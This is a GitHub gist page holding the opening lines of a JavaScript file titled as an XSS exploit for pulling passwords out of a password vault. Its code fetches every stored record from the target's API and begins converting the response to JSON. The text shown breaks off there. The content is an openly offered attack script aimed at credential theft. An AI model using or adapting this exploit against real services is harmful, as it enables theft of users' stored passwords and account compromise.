Skip to content

Instantly share code, notes, and snippets.

View edwinlu's full-sized avatar

Edwin Lu edwinlu

  • Taiwan
View GitHub Profile
@edwinlu
edwinlu / password_vault_exploit.js
Created August 21, 2018 06:12 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON